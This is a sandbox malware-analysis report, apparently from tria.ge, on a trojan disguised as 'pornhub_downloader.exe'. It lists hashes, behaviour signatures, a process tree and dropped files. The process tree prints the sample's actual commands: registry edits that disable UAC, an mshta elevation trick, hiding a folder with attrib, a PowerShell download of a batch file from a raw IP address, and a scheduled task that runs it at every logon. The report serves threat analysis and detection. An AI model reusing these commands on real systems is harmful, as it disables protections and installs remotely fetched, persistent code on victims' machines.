Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/09/2024, 11:49

General

  • Target

    pornhub_downloader.exe

  • Size

    88KB

  • MD5

    759f5a6e3daa4972d43bd4a5edbdeb11

  • SHA1

    36f2ac66b894e4a695f983f3214aace56ffbe2ba

  • SHA256

    2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d

  • SHA512

    f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385

  • SSDEEP

    1536:D7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIf+xB4O5:fq6+ouCpk2mpcWJ0r+QNTBf+LV

Malware Config

Signatures

  • UAC bypass 3 TTPs 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Powershell Invoke Web Request.

  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.exe
    "C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3096
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5E0E.tmp\5E0F.tmp\5E10.bat C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4032
      • C:\Windows\system32\mshta.exe
        mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE","goto :target","","runas",1)(window.close)
        3⤵
        • Checks computer location settings
        • Access Token Manipulation: Create Process with Token
        • Suspicious use of WriteProcessMemory
        PID:4000
        • C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE
          "C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE" goto :target
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3388
          • C:\Windows\system32\cmd.exe
            "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\61F6.tmp\61F7.tmp\61F8.bat C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE goto :target"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:684
            • C:\Windows\system32\reg.exe
              reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
              6⤵
              • UAC bypass
              PID:2848
            • C:\Windows\system32\reg.exe
              reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
              6⤵
              • UAC bypass
              PID:2440
            • C:\Windows\system32\reg.exe
              reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
              6⤵
              • UAC bypass
              PID:3360
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:5060
              • C:\Windows\system32\reg.exe
                reg query HKEY_CLASSES_ROOT\http\shell\open\command
                7⤵
                  PID:3532
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
                6⤵
                • Enumerates system info in registry
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                • Suspicious use of WriteProcessMemory
                PID:3908
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd0fd646f8,0x7ffd0fd64708,0x7ffd0fd64718
                  7⤵
                    PID:2760
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1956 /prefetch:2
                    7⤵
                      PID:2724
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3
                      7⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2408
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2656 /prefetch:8
                      7⤵
                        PID:1440
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
                        7⤵
                          PID:2348
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
                          7⤵
                            PID:2592
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:1
                            7⤵
                              PID:3976
                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5568 /prefetch:8
                              7⤵
                                PID:1104
                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5568 /prefetch:8
                                7⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:1808
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1
                                7⤵
                                  PID:1456
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:1
                                  7⤵
                                    PID:3924
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4204 /prefetch:1
                                    7⤵
                                      PID:1776
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:1
                                      7⤵
                                        PID:4488
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1856 /prefetch:2
                                        7⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:2156
                                    • C:\Windows\system32\attrib.exe
                                      attrib +s +h d:\net
                                      6⤵
                                      • Sets file to hidden
                                      • Views/modifies file attributes
                                      PID:3568
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
                                      6⤵
                                      • Blocklisted process makes network request
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2688
                                    • C:\Windows\system32\schtasks.exe
                                      SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
                                      6⤵
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:4352
                          • C:\Windows\System32\CompPkgSrv.exe
                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                            1⤵
                              PID:4284
                            • C:\Windows\System32\CompPkgSrv.exe
                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                              1⤵
                                PID:1212

                              Network

                              MITRE ATT&CK Enterprise v15

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                Filesize

                                152B

                                MD5

                                2dc1a9f2f3f8c3cfe51bb29b078166c5

                                SHA1

                                eaf3c3dad3c8dc6f18dc3e055b415da78b704402

                                SHA256

                                dcb76fa365c2d9ee213b224a91cdd806d30b1e8652d72a22f2371124fa4479fa

                                SHA512

                                682061d9cc86a6e5d99d022da776fb554350fc95efbf29cd84c1db4e2b7161b76cd1de48335bcc3a25633079fb0bd412e4f4795ed6291c65e9bc28d95330bb25

                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                Filesize

                                152B

                                MD5

                                e4f80e7950cbd3bb11257d2000cb885e

                                SHA1

                                10ac643904d539042d8f7aa4a312b13ec2106035

                                SHA256

                                1184ee8d32d0edecddd93403fb888fad6b3e2a710d37335c3989cc529bc08124

                                SHA512

                                2b92c9807fdcd937e514d4e7e1cc7c2d3e3aa162099b7289ceac2feea72d1a4afbadf1c09b3075d470efadf9a9edd63e07ea7e7a98d22243e45b3d53473fa4f0

                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                Filesize

                                816B

                                MD5

                                3b8aae1408771ba514da9b4948f27da8

                                SHA1

                                b2213ccfa4c7ec6c2d0fe44c75b77638ebb98638

                                SHA256

                                051901fb272ac05974cf3e13982bbfb21524baf2d510ad19c08430da1f2c4984

                                SHA512

                                4a3e8155f992c72abab7962b81fbf6ae055bd2b79a5bb3f9abd0400a1e63525ec316d5c370bf79f28ef2e4a4aa6a5f6cc171549e4d08ae11aabed0f0d0b97472

                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                Filesize

                                1KB

                                MD5

                                46c7f5d449959bcec45c5b5d4c5cf6b1

                                SHA1

                                5c247ecb0124d34e5b6684c88c901d37e7e30be1

                                SHA256

                                c7da5a0f8bd179485c6948b8eda6fa39a0c557cd894dd1218ea5ebce5133e3ec

                                SHA512

                                6a19b64fadad93e398ec4881c05adc7f0d253249dc4eb063afbd254e240148e8421cf5d7c12fc90f5d4d66883ef34755ee814473705d38d20b5d36a60a51fc27

                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                Filesize

                                5KB

                                MD5

                                f0ffbb8d1550aaed39ce2c85cf15c6bf

                                SHA1

                                a022baba3bcb61f681fd20a12c8848c98555c4e1

                                SHA256

                                e1ed2f98219081718e3d989a33355548913b15173562c8d6c10cdcc4b88bf950

                                SHA512

                                f5a4762197683c5311ff64596d30a426d33025adb2a977a33757f67a07f8b2ecb5be5769ae1aabc6a1bce244076eb8b8eade5c1fe6e384095a9d7009bebbf955

                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                Filesize

                                6KB

                                MD5

                                901450ef910ce5ade2cc92a5207c7032

                                SHA1

                                e6e38fde6cea0289c8c2176e57d0a8c2bd1e1620

                                SHA256

                                0c3980469ffefee509070afb9cd36de98eb08557561274c7df48a72264a930cb

                                SHA512

                                25a04c888b4398ea3db1bc92964679640fa0193c68fef948a74ff6b190a1beaa471cd1ddca5143a61ff85b0b24cb80f8de847f6b2f16b28f5b9c5216d2e10657

                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                Filesize

                                96B

                                MD5

                                f9b4be0b1d94e9caadc6ea4494dbf4fb

                                SHA1

                                d79e2a4bcee3a5ecce5bc89f8d302ceffbe97997

                                SHA256

                                9e4222c7a2c18c54bcb2460278bcdb8fe5233ba610b2e886afe7ca60cdab3d3e

                                SHA512

                                653de47cb51cf2801e8fbfb97ef0df2997c529845c3f799461230e0ddff06d8ad781d6cef4429207a78cf3120c3e63d2fbac8ec24d4883d5698d7bc5886b09b3

                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57c18b.TMP

                                Filesize

                                48B

                                MD5

                                3e13cf3264eec518a5c3a53c650ff025

                                SHA1

                                4e8ad27a535a684598cad23629cd3af9dca629c4

                                SHA256

                                7f898cb091aa7ab44899c80ce3334ce9d711561778cf606154977dd1d9d26cca

                                SHA512

                                5af2a33508915c1491a23148053b38db6a9954812c79509178a283790ec3a9cd75be5f8cc6a6c869f9601cd389aa54e1684bded06015013c5008679d8bafa126

                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                Filesize

                                16B

                                MD5

                                6752a1d65b201c13b62ea44016eb221f

                                SHA1

                                58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                SHA256

                                0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                SHA512

                                9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                Filesize

                                10KB

                                MD5

                                d77502c02bd16d961e02e5e5d9275959

                                SHA1

                                50849736acff07042159e715750e29a98fa99c00

                                SHA256

                                6ea12fb887414f90a2375bea2368cbeb36e1f6e13c11ff101c00f0054b65951a

                                SHA512

                                839d1d110187a22a1e5e2b6db39927329b8d4c6078cbc3792fed00c11d880320e9a9f6d9582eaadfe943755e0a12191cfaaf7b567e260b3ca447d2718ab891d4

                              • C:\Users\Admin\AppData\Local\Temp\5E0E.tmp\5E0F.tmp\5E10.bat

                                Filesize

                                1KB

                                MD5

                                9856d2fe29a28c54c5943c2150f7bae1

                                SHA1

                                f7532a2a79b1b6aca1c151b34fe8b1ce2c798e97

                                SHA256

                                0b6140b4764863f3263b0be87f35c9afe9a849823eccf37259bed08baa93e999

                                SHA512

                                002db693f5664f80e58bb3590f32068f611bc97d3f71324abb659dd1fd0bffe3df36379ae92ffbeabde10bd6245b3c069b56ba4d8b4608c634a2525e7a76735f

                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ocsefr0f.2rs.ps1

                                Filesize

                                60B

                                MD5

                                d17fe0a3f47be24a6453e9ef58c94641

                                SHA1

                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                SHA256

                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                SHA512

                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                              • memory/2688-17-0x000001AFC11C0000-0x000001AFC11E2000-memory.dmp

                                Filesize

                                136KB